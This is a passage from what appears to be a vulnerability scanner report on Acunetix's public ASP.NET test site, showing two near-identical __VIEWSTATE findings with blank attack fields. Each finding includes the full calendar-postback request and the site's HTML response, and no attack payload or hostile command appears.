more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8254&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAgMUHeNoIZGRkf4syimstv4Hy%2FQCtHppQ%2BGGSEuM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLX6IuRCgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DCXHHHe5sL3skgKHw7HpM2S2CLNA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:44 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAgMUHeNoIZGRkf4syimstv4Hy/QCtHppQ+GGSEuM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLX6IuRCgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DCXHHHe5sL3skgKHw7HpM2S2CLNA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:White" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8258&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAJ28se9oIZGRkcZh7ATUlOSdPlg5KvE11fEiy68Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLD%2Bv%2FaCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D2BFOCvcK0xbi56cGRclC%2BtARp1c%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:05 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAJ28se9oIZGRkcZh7ATUlOSdPlg5KvE11fEiy68Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLD+v/aCAKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D2BFOCvcK0xbi56cGRclC+tARp1c=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:White" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL 